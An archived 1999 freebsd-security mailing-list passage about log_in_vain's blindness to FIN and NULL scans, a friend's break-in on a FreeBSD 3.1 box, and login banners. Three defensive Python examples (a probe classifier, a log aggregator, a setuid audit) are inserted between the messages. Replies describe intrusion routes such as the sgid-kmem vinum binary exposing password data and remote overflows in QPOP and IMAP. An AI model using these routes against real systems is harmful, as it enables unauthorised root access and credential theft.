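An added example from the editor illustrating the point above, not code from Yan's message or from FreeBSD: a decoder for the fixed TCP header that classifies unsolicited segments to non-listening ports by their flag bits, so that FIN, NULL and Xmas probes are counted alongside the SYNs that net.inet.tcp.log_in_vain reports. The segments, the listening-port set and the probe mix are constructed by hand; the classification names follow common scanner usage and are the editor's, not the kernel's.

```python
"""Classify TCP probes by flag bits (added example).

Shows what log_in_vain misses: it reports SYN-only probes, while a FIN,
NULL or Xmas sweep against closed ports produces no log line at all.
All packets below are built by build_tcp(); nothing is read from the wire.
"""
import struct
from typing import Dict, Iterable

# TCP flag bits in the low byte of the flags field (RFC 793 layout).
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

TCP_HDR = "!HHIIBBHHH"   # sport, dport, seq, ack, offset/reserved, flags, win, csum, urp


def parse_tcp(segment: bytes) -> Dict[str, int]:
    """Decode the 20-byte fixed TCP header; refuse truncated input."""
    if len(segment) < 20:
        raise ValueError("short TCP header")
    sport, dport, _seq, _ack, offres, flags, _win, _csum, _urp = struct.unpack(
        TCP_HDR, segment[:20])
    return {"sport": sport, "dport": dport, "flags": flags,
            "hlen": (offres >> 4) * 4}


def classify(flags: int) -> str:
    """Name the probe type an unsolicited segment to a closed port looks like."""
    if flags == 0:
        return "null"
    if flags & SYN and not flags & ACK:
        return "syn"            # the only case log_in_vain would report
    if flags == FIN:
        return "fin"
    if flags & FIN and flags & PSH and flags & URG:
        return "xmas"
    if flags == ACK:
        return "ack"
    return "other"


def build_tcp(sport: int, dport: int, flags: int) -> bytes:
    """Assemble a minimal header (data offset 5, zero seq/ack/checksum) for test input."""
    return struct.pack(TCP_HDR, sport, dport, 0, 0, 5 << 4, flags, 65535, 0, 0)


def audit(segments: Iterable[bytes], listening: set) -> Dict[str, int]:
    """Count probe types aimed at ports we do not listen on, and how many of
    them a SYN-only logger such as log_in_vain would actually have logged."""
    counts: Dict[str, int] = {"logged_by_log_in_vain": 0}
    for seg in segments:
        hdr = parse_tcp(seg)
        if hdr["dport"] in listening:
            continue                       # real traffic, not a probe
        kind = classify(hdr["flags"])
        counts[kind] = counts.get(kind, 0) + 1
        if kind == "syn":
            counts["logged_by_log_in_vain"] += 1
    return counts


# Constructed sweep mixing SYN, FIN, NULL and Xmas probes against closed
# ports, plus one legitimate SYN to a listening service.
LISTENING = {22, 80}
PROBES = [
    build_tcp(40000, 80, SYN),                # legitimate, ignored by audit()
    build_tcp(40001, 23, SYN),
    build_tcp(40002, 25, FIN),
    build_tcp(40003, 110, 0),
    build_tcp(40004, 143, FIN | PSH | URG),
    build_tcp(40005, 6000, FIN),
]

if __name__ == "__main__":
    print(audit(PROBES, LISTENING))
```

Of the five probes to closed ports in the sample, only the one SYN would show up under log_in_vain; the other four leave no trace without a packet-level check of this kind.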
-- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 2:44: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46]) by hub.freebsd.org (Postfix) with ESMTP id 8253514F84 for ; Fri, 28 May 1999 02:44:01 -0700 (PDT) (envelope-from ark@eltex.ru) Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id NAA21987; Fri, 28 May 1999 13:43:51 +0400 (MSD) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Fri, 28 May 1999 13:43:08 +0400 Received: from undisclosed-intranet-sender id xma026984; Fri, 28 May 99 13:43:06 +0400 Date: Fri, 28 May 1999 13:42:56 +0400 Message-Id: <199905280942.NAA13537@paranoid.eltex.spb.ru> In-Reply-To: <19990528023139.A15594@best.com> from ""Jan B. Koum " " 
From: ark@eltex.ru Organization: "Klingon Imperial Intelligence Service" Subject: Re: TCP connect data logger To: jkb@best.com Cc: dada@sbox.tu-graz.ac.at, security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, I remember a patch was posted here to log all TCP packets that are not part of some known sequence. Really simple thing. "Jan B. Koum " said : > On Wed, May 26, 1999 at 02:05:14PM +0200, Martin Kammerhofer wrote: > > On Tue, 25 May 1999, Jason Garman wrote: > > > > > Last time I used this option (2.2.8-RELEASE), it only logged the packet > > > headers to syslog. Something like this: > > > > > > Connection attempt to UDP x.x.x.x:port from y.y.y.y:port > > > > > > theres also a tunable net.inet.tcp.log_in_vain which does the same thing > > > for TCP packets. > > > > > > > Both udp.log_in_vain and tcp.log_in_vain have *no* rate limiting. > > Enabling them can generate huge amounts of LOG_INFO messages during > > port scans. > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > You should also note that net.inet.tcp.log_in_vain will ONLY log > packets which have SYN bit set. That sucks if you get port scanned by > something like nmap which can use FIN scan for example. (Or some other > stealth scanning technique). _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! 
-----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBN05lHaH/mIJW9LeBAQGPRAP/Ro2/SqP5ELJDyGEMREfypU27m6P28iex 6T4axzhfcW4JRm4/9rIyVbBDxFWv5P42sPKWXXHptZZcqdy73zVjLTI1qrJ1vBek /pu8cNChP1uvx3NT1ydduWImXwqmbHb+bqd9XYgYoXNy32h5oVa9ppKzOkuU9yUO ZFxxtlamiH4= =uV6A -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 2:48:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 7CBB914F84 for ; Fri, 28 May 1999 02:48:24 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id CAA18283; Fri, 28 May 1999 02:47:31 -0700 (PDT) Message-ID: <19990528024730.B15594@best.com> Date: Fri, 28 May 1999 02:47:30 -0700 
From: "Jan B. Koum " To: Dima , security@FreeBSD.ORG Subject: Re: System beeing cracked! References: <199905280927.OAA08009@nic.mmc.net.ge> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <199905280927.OAA08009@nic.mmc.net.ge>; from Dima on Fri, May 28, 1999 at 02:27:23PM +0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Fri, May 28, 1999 at 02:27:23PM +0500, Dima wrote:
> Hello,
> I have 3.1 installed and a friend of mine made a bet that he could hack into my system. He has an ordinary account open. So, he won! And I am wondering if there are any security holes in 3.1? He logged in as himself via telnet, then made himself root (but he was not in the wheel group and of course did not know the root password) and, what is more interesting, he cracked several passwords. He did all this in 2 hours, and the passwords were a minimum of 10 symbols in length, containing different cases and digits. I am using MD5 coding, and as far as I knew that is impossible. Does anyone have an idea how it was done? Please answer me, as my friend does not tell me anything about this since he feels like a guru-hacker.
> Thank you.

Hello,

By default 3.0-RELEASE was shipped with /sbin/vinum set sgid kmem, which allowed people to read /dev/*mem -- which is where it is possible to grab your password file from. You can also do other nasties when you have sgid kmem handy. See (as one big line):

http://www.freebsd.org/cgi/getmsg.cgi?fetch=38413+41513+ /usr/local/www/db/text/1999/freebsd-security/19990124.freebsd-security

This vinum bug was fixed on Jan 13th -- have you upgraded your system since? [Yes, I know you said you got 3.1, but I am just checking first]

Of course, you might have had /root/.rhosts with "+ +" in it or some such. Or maybe you had an older version of QPOP or an imap server running? Those have remote overflows in them.
Have you ever logged in from your friend's machine into your machine and done 'su'? He might have had your keystrokes logged.

Hard to tell how exactly your system got cracked. There are many ways. Most of them are not the OS's fault either.

-- Yan

From owner-freebsd-security Fri May 28 2:51:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 3CC3D14F84 for ; Fri, 28 May 1999 02:51:32 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id CAA18491; Fri, 28 May 1999 02:50:07 -0700 (PDT) Message-ID: <19990528025007.C15594@best.com> Date: Fri, 28 May 1999 02:50:07 -0700
From: "Jan B. Koum " To: ark@eltex.ru Cc: dada@sbox.tu-graz.ac.at, security@FreeBSD.ORG Subject: Re: TCP connect data logger References: <19990528023139.A15594@best.com> <199905280942.NAA13537@paranoid.eltex.spb.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <199905280942.NAA13537@paranoid.eltex.spb.ru>; from ark@eltex.ru on Fri, May 28, 1999 at 01:42:56PM +0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Fri, May 28, 1999 at 01:42:56PM +0400, ark@eltex.ru wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
>
> nuqneH,
>
> I remember a patch was posted here to log all TCP packets that are not part
> of some known sequence. Really simple thing.

Are you talking about the http://www.best.com/~jkb/tcp_input.diff.txt one? I need to make it better .. I don't think it handles a fast scan rate on a 100base network well.

-- Yan

> > You should also note that net.inet.tcp.log_in_vain will ONLY log
> > packets which have SYN bit set. That sucks if you get port scanned by
> > something like nmap which can use FIN scan for example. (Or some other
> > stealth scanning technique).
From owner-freebsd-security Fri May 28 3: 4:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46]) by hub.freebsd.org (Postfix) with ESMTP id 95E1B14C41 for ; Fri, 28 May 1999 03:04:33 -0700 (PDT) (envelope-from ark@eltex.ru) Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id OAA22133; Fri, 28 May 1999 14:04:29 +0400 (MSD) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Fri, 28 May 1999 14:03:48 +0400 Received: from undisclosed-intranet-sender id xma027049; Fri, 28 May 99 14:03:48 +0400 Date: Fri, 28 May 1999 14:03:38 +0400 Message-Id: <199905281003.OAA13633@paranoid.eltex.spb.ru> In-Reply-To: <19990528025007.C15594@best.com> from ""Jan B. Koum " "
From: ark@eltex.ru Organization: "Klingon Imperial Intelligence Service" Subject: Re: TCP connect data logger To: jkb@best.com Cc: ark@eltex.ru, dada@sbox.tu-graz.ac.at, security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, Yep, something like this one. It does not handle heavy load, though, nor original log_in_vain does. Actually syslogd does not. So i don't see any good workarounds, maybe some rate analysers could help.. "Jan B. Koum " said : > On Fri, May 28, 1999 at 01:42:56PM +0400, ark@eltex.ru wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > > > nuqneH, > > > > I remember a patch was posted here to log all TCP packets that are not part > > of some known sequence. Really simple thing. > > Are you talking about http://www.best.com/~jkb/tcp_input.diff.txt > one? I need to make it better .. I don't think it handles fast scan rate on > 100base network well. > > -- Yan > > > > You should also note that net.inet.tcp.log_in_vain will ONLY log > > > packets which have SYN bit set. That sucks if you get port scanned by > > > something like nmap which can use FIN scan for example. (Or some other > > > stealth scanning technique). _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! 
-----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBN05p+aH/mIJW9LeBAQEo4AP/XKAny3R0pWXomOcV6f2yphQqFLGc5sUk ps4lx4eWwZknhfjqUkBJEDguXKcOtGjq6nMcm999KGsHHQgughp4z+tc44IYEJex a5xWqw6rqL2hiZRJyqFWkcFvsWWtagrdoZ2ekx/5c1iTlMuF17hUI/JsybNGER7W 3ZvD95LRZuE= =PwDa -----END PGP SIGNATURE-----

From owner-freebsd-security Fri May 28 3:13:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id F180C14C8B for ; Fri, 28 May 1999 03:13:19 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id DAA20325; Fri, 28 May 1999 03:12:18 -0700 (PDT) Message-ID: <19990528031217.D15594@best.com> Date: Fri, 28 May 1999 03:12:17 -0700
From: "Jan B. Koum " To: Jamie Rishaw , Chriss Cc: Nicholas Brawn , freebsd-security@FreeBSD.ORG Subject: Re: legal notice for telnet/etc References: <19990528001436.C28844@rage.arpa.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <19990528001436.C28844@rage.arpa.com>; from Jamie Rishaw on Fri, May 28, 1999 at 12:14:36AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Fri, May 28, 1999 at 12:14:36AM -0500, Jamie Rishaw wrote:
> Note, that doesn't work for ssh.
>
> I use /etc/COPYRIGHT for all my must-reads.
>
> The only problem is, that's post-login.
>
> You can define the copyright file in /etc/login.conf with the ":copyright=" directive.
>
> -jamie

Uhm... 'must-read'? ;) Heh. Guess what? If a user has .hushlogin in his $HOME, he/she is not going to see your /etc/COPYRIGHT message at all:

% touch $HOME/.hushlogin
% cat /etc/COPYRIGHT
lkadjflkasjfasdl
% login
login: jkb
Password:
%

See /usr/src/usr.bin/login/login.c around line 548.

The best way to make sure your users see a message is to place a hack into login.c which just ignores the existence of the .hushlogin file.

BTW, sshd does not use /usr/bin/login (unless you force it to do so, and it then needs a patch to do it right and not core on BSD). So with sshd you just edit /etc/sshd_config (or /usr/local/etc) and set "PrintMotd yes" in the sshd config file. Then of course you need to make sshd ignore $HOME/.hushlogin also... ;-)

Argh! Hell. There is no good way to get your message across. If l^Husers choose not to read it, they will not read it no matter what.
:(

-- Yan

From owner-freebsd-security Fri May 28 3:25:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id ADC9B14C8B for ; Fri, 28 May 1999 03:25:28 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id DAA21262; Fri, 28 May 1999 03:24:30 -0700 (PDT) Message-ID: <19990528032430.E15594@best.com> Date: Fri, 28 May 1999 03:24:30 -0700
From: "Jan B. Koum " To: ark@eltex.ru Cc: dada@sbox.tu-graz.ac.at, security@FreeBSD.ORG Subject: Re: TCP connect data logger References: <19990528025007.C15594@best.com> <199905281003.OAA13633@paranoid.eltex.spb.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <199905281003.OAA13633@paranoid.eltex.spb.ru>; from ark@eltex.ru on Fri, May 28, 1999 at 02:03:38PM +0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There was a brief talk on security-officer@ of using something similar to a simple queue which just keeps a counter of how many packets you see. I am not sure if anything came out of this. I can see a problem where you have to ignore ports for logging -- else your events don't match. For example, if I see a scan from: xxx:random -> yyy:random I have to ignore 'random' ports. (Else all event to log look very different and will only have counter of one). Back to ground zero. Hmm... -- Yan On Fri, May 28, 1999 at 02:03:38PM +0400, ark@eltex.ru wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > nuqneH, > > Yep, something like this one. It does not handle heavy load, though, > nor original log_in_vain does. Actually syslogd does not. So i don't see > any good workarounds, maybe some rate analysers could help.. > > "Jan B. Koum " said : > > > On Fri, May 28, 1999 at 01:42:56PM +0400, ark@eltex.ru wrote: > > > -----BEGIN PGP SIGNED MESSAGE----- > > > > > > nuqneH, > > > > > > I remember a patch was posted here to log all TCP packets that are not part > > > of some known sequence. Really simple thing. > > > > Are you talking about http://www.best.com/~jkb/tcp_input.diff.txt > > one? I need to make it better .. I don't think it handles fast scan rate on > > 100base network well. > > > > -- Yan > > > > > > You should also note that net.inet.tcp.log_in_vain will ONLY log > > > > packets which have SYN bit set. 
> > > > That sucks if you get port scanned by
> > > > something like nmap which can use FIN scan for example. (Or some other
> > > > stealth scanning technique).

From owner-freebsd-security Fri May 28 3:49: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id 91B4A14C87 for ; Fri, 28 May 1999 03:48:53 -0700 (PDT) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 3.00 #1) id 10nKBb-0000Aq-00; Fri, 28 May 1999 12:48:23 +0200
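The log_in_vain thread above ends on two practical problems: the sysctl has no rate limiting, so a port scan floods syslogd, and, as Jan notes, keying log events on the port numbers turns every probe into a unique event with a count of one. The following is an added example, not code from the thread, from FreeBSD, or from Jan's tcp_input.diff. It is an offline aggregator over syslog lines in the "Connection attempt to ..." form quoted by Jason Garman; the syslog prefix (timestamp, host, "/kernel:") and the sample addresses are assumptions, and the log lines are constructed. It keys on source address and protocol, ignoring both port numbers, forwards at most two raw lines per source, then emits one summary per source and tags a source that touched five or more distinct ports as a scan.

```python
"""Aggregate FreeBSD log_in_vain syslog lines offline (added example)."""
import re

# Kernel message text as quoted in the thread; the syslog prefix
# (timestamp, host, "/kernel:") is an assumption about the 3.x format.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ /kernel: "
    r"Connection attempt to (?P<proto>TCP|UDP) "
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):(?P<dport>\d+) "
    r"from (?P<src>\d{1,3}(?:\.\d{1,3}){3}):(?P<sport>\d+)$"
)

# Constructed sample: one host probing six ports, a single UDP probe,
# an unrelated sshd line, and one auth(113) lookup from a legitimate peer.
SAMPLE_LOG = """\
May 28 02:05:14 gw /kernel: Connection attempt to TCP 10.0.0.5:21 from 192.0.2.7:40001
May 28 02:05:14 gw /kernel: Connection attempt to TCP 10.0.0.5:22 from 192.0.2.7:40002
May 28 02:05:14 gw /kernel: Connection attempt to TCP 10.0.0.5:23 from 192.0.2.7:40003
May 28 02:05:15 gw /kernel: Connection attempt to TCP 10.0.0.5:25 from 192.0.2.7:40004
May 28 02:05:15 gw /kernel: Connection attempt to TCP 10.0.0.5:80 from 192.0.2.7:40005
May 28 02:05:15 gw /kernel: Connection attempt to TCP 10.0.0.5:110 from 192.0.2.7:40006
May 28 02:05:16 gw /kernel: Connection attempt to UDP 10.0.0.5:161 from 198.51.100.9:1025
May 28 02:05:20 gw sshd[123]: Accepted password for jkb from 203.0.113.4 port 1022
May 28 02:06:01 gw /kernel: Connection attempt to TCP 10.0.0.5:113 from 203.0.113.4:1234
"""


def parse_line(line):
    """Return the fields of one log_in_vain line, or None for anything else."""
    m = LINE_RE.match(line.rstrip("\n"))
    if m is None:
        return None
    ev = m.groupdict()
    ev["dport"] = int(ev["dport"])
    ev["sport"] = int(ev["sport"])
    return ev


def aggregate(lines):
    """Group probes by (source, protocol) only.

    Keying on the port numbers as well is the trap Jan describes: a scan
    then produces N distinct events that each have a count of one.
    """
    groups = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        g = groups.setdefault((ev["src"], ev["proto"]),
                              {"count": 0, "dports": set(),
                               "first": ev["ts"], "last": ev["ts"]})
        g["count"] += 1
        g["dports"].add(ev["dport"])
        g["last"] = ev["ts"]
    return groups


def report(lines, scan_threshold=5, verbose_limit=2):
    """Lines worth forwarding to syslog: at most verbose_limit raw probe
    lines per (source, protocol), then one summary line per group.
    A source that touched scan_threshold or more distinct ports is
    tagged SCAN; everything else is a probe."""
    lines = list(lines)
    out = []
    seen = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        key = (ev["src"], ev["proto"])
        seen[key] = seen.get(key, 0) + 1
        if seen[key] <= verbose_limit:
            out.append(line.rstrip("\n"))
    for (src, proto), g in aggregate(lines).items():
        tag = "SCAN" if len(g["dports"]) >= scan_threshold else "probe"
        out.append("%s %s from %s: %d attempts on %d ports, %d lines suppressed, %s .. %s"
                   % (tag, proto, src, g["count"], len(g["dports"]),
                      max(0, g["count"] - verbose_limit), g["first"], g["last"]))
    return out


if __name__ == "__main__":
    for msg in report(SAMPLE_LOG.splitlines()):
        print(msg)
```

Run against a real /var/log/messages this turns a scan of a few thousand ports into two raw lines and one summary; the per-source counter is the "simple queue which just keeps a counter" Jan mentions, with the ports deliberately left out of the key. It only sees SYN probes, for the reason Jan gives: log_in_vain never logs a FIN scan in the first place.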
From: Sheldon Hearn To: "Jan B. Koum " Cc: Nicholas Brawn , freebsd-security@FreeBSD.ORG Subject: Re: legal notice for telnet/etc In-reply-to: Your message of "Fri, 28 May 1999 03:12:17 MST." <19990528031217.D15594@best.com> Date: Fri, 28 May 1999 12:48:23 +0200 Message-ID: <671.927888503@axl.noc.iafrica.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Fri, 28 May 1999 03:12:17 MST, "Jan B. Koum " wrote:

> Argh! Hell. There is not good way to get your message across. If
> l^Huser choose not to read it, they will not read it no matter what. :(

Nicholas isn't looking for a way to force text upon people who have logged into the system. He wants to force text upon people who are presented with a login prompt.

The short and sweet of it is that there is no unified mechanism for this. You'll have to identify all entry points and either tickle or kludge, depending on the flexibility of each.

Ciao,
Sheldon.

From owner-freebsd-security Fri May 28 4:57:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id E8F5C14C81 for ; Fri, 28 May 1999 04:57:55 -0700 (PDT) (envelope-from ncb@zip.com.au) Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id VAA00090; Fri, 28 May 1999 21:57:37 +1000 Date: Fri, 28 May 1999 21:57:36 +1000 (EST)
From: Nicholas Brawn To: Dima Cc: security@FreeBSD.ORG Subject: Re: System beeing cracked! In-Reply-To: <199905280927.OAA08009@nic.mmc.net.ge> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

The first thing I recommend you do is identify all setuid and setgid files on the system:

# find / -perm -4000 > /tmp/suid.log
# find / -perm -2000 > /tmp/sgid.log

After doing that, review them for any odd files. I'm guessing he exploited a privileged program.

Alternatively, review what services are running, and check you're running the latest versions of all of them.

Nick

On Fri, 28 May 1999, Dima wrote:
> Hello,
> I have 3.1 installed and a friend of mine made a bet that he could hack into my system. He has an ordinary account open. So, he won! And I am wondering if there are any security holes in 3.1? He logged in as himself via telnet, then made himself root (but he was not in the wheel group and of course did not know the root password) and, what is more interesting, he cracked several passwords. He did all this in 2 hours, and the passwords were a minimum of 10 symbols in length, containing different cases and digits. I am using MD5 coding, and as far as I knew that is impossible. Does anyone have an idea how it was done? Please answer me, as my friend does not tell me anything about this since he feels like a guru-hacker.
> Thank you.
From owner-freebsd-security Fri May 28 5:13:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id 005EF14CCB for ; Fri, 28 May 1999 05:13:27 -0700 (PDT) (envelope-from ncb@zip.com.au) Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id WAA00890; Fri, 28 May 1999 22:13:11 +1000 Date: Fri, 28 May 1999 22:13:09 +1000 (EST)
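Nick's two find(1) runs above are the right first step after a break-in; what makes them a usable check is comparing the result with an inventory taken while the box was known-good, because an intruder who got root via a setuid program will often leave a setuid-root shell or a re-owned binary behind. The following is an added example, not code from the thread or from FreeBSD: it does the same walk in Python in one pass, records mode, owner and group for every setuid or setgid regular file, and diffs two snapshots. The build_demo_tree helper and the file names it creates are constructed for demonstration; vinum is only borrowed as a name from Jan's reply.

```python
"""Setuid/setgid inventory with baseline comparison (added example)."""
import os
import stat
import sys
import tempfile

PRIV_BITS = stat.S_ISUID | stat.S_ISGID


def audit_privileged(root):
    """One-pass equivalent of `find / -perm -4000` plus `find / -perm -2000`.

    Returns {path: (permission bits, uid, gid)} for every regular file
    under root carrying the setuid or setgid bit. Symlinks are examined
    with lstat and never followed, as find does by default; unreadable
    directories are skipped rather than aborting the walk.
    """
    found = {}
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & PRIV_BITS:
                found[path] = (stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid)
    return found


def diff_baseline(baseline, current):
    """Compare a fresh inventory against one taken when the host was known
    good. New entries (a setuid-root shell left by the intruder) and
    mode/owner changes on known entries are what to read first; removed
    entries show where something was replaced or cleaned up."""
    added = {p: v for p, v in current.items() if p not in baseline}
    removed = {p: v for p, v in baseline.items() if p not in current}
    changed = {p: (baseline[p], v) for p, v in current.items()
               if p in baseline and baseline[p] != v}
    return added, removed, changed


def describe(path, entry):
    """Render one inventory entry the way a reviewer wants to read it."""
    mode, uid, gid = entry
    tags = []
    if mode & stat.S_ISUID:
        tags.append("setuid-root" if uid == 0 else "setuid(uid=%d)" % uid)
    if mode & stat.S_ISGID:
        tags.append("setgid(gid=%d)" % gid)
    return "%s %04o %s" % (path, mode, " ".join(tags))


def build_demo_tree(root=None, setuid=(), plain=()):
    """Constructed fixture: create empty files under root, giving the names
    in `setuid` mode 4755 and the names in `plain` mode 0755.
    Returns (root, {name: path})."""
    root = root or tempfile.mkdtemp(prefix="suid-audit-")
    paths = {}
    for name in list(setuid) + list(plain):
        path = os.path.join(root, name)
        with open(path, "w"):
            pass
        os.chmod(path, 0o4755 if name in setuid else 0o755)
        paths[name] = path
    return root, paths


if __name__ == "__main__":
    # Real use: run as root against /, keep the result off-host, rerun later.
    target = sys.argv[1] if len(sys.argv) > 1 else "/"
    for path, entry in sorted(audit_privileged(target).items()):
        print(describe(path, entry))
```

Two caveats a practitioner would add: the baseline has to live off the machine, because whoever has root can edit a local copy to match; and on a compromised box the walk should be run from a known-good kernel and userland (boot media), since a replaced ls or find will happily hide the file you are looking for.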
From: Nicholas Brawn To: Sheldon Hearn Cc: "Jan B. Koum " , freebsd-security@FreeBSD.ORG Subject: Re: legal notice for telnet/etc In-Reply-To: <671.927888503@axl.noc.iafrica.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

For the systems I'm looking at, the main entry points into the system will be:

- Telnet
- FTP
- SSH
- SFTP/SCP

Telnet and FTP banners look relatively simple to implement. But it looks a bit tricky with ssh without displaying until the user has logged in. Alternatively you could get them to sign a legal document prior to granting them access to IT resources which discusses what authority they have over what, which is already a recommendation. If it cannot be displayed until a user logs in (/etc/motd), nobody's going to die. And if you say they may be able to quell such notices via .hushlogin, we can add something to /etc/profile to display notices, or even specify a program as their shell which does nothing more than display the notice before dropping them into a shell.

At this stage I'm keen to find out what simple solutions are available. If I need to tinker, so be it. :)

Thanks to everyone for the input,
Nick

On Fri, 28 May 1999, Sheldon Hearn wrote:
> On Fri, 28 May 1999 03:12:17 MST, "Jan B. Koum " wrote:
>
> > Argh! Hell. There is not good way to get your message across. If
> > l^Huser choose not to read it, they will not read it no matter what. :(
>
> Nicholas isn't looking for a way to force text upon people who have
> logged into the system. He wants to force text upon people who are
> presented with a login prompt.
>
> The short and sweet of it is that there is no unified mechanism for
> this. You'll have to identify all entry points and either tickle or
> kludge, depending on the flexibility of each.
>
> Ciao,
> Sheldon.
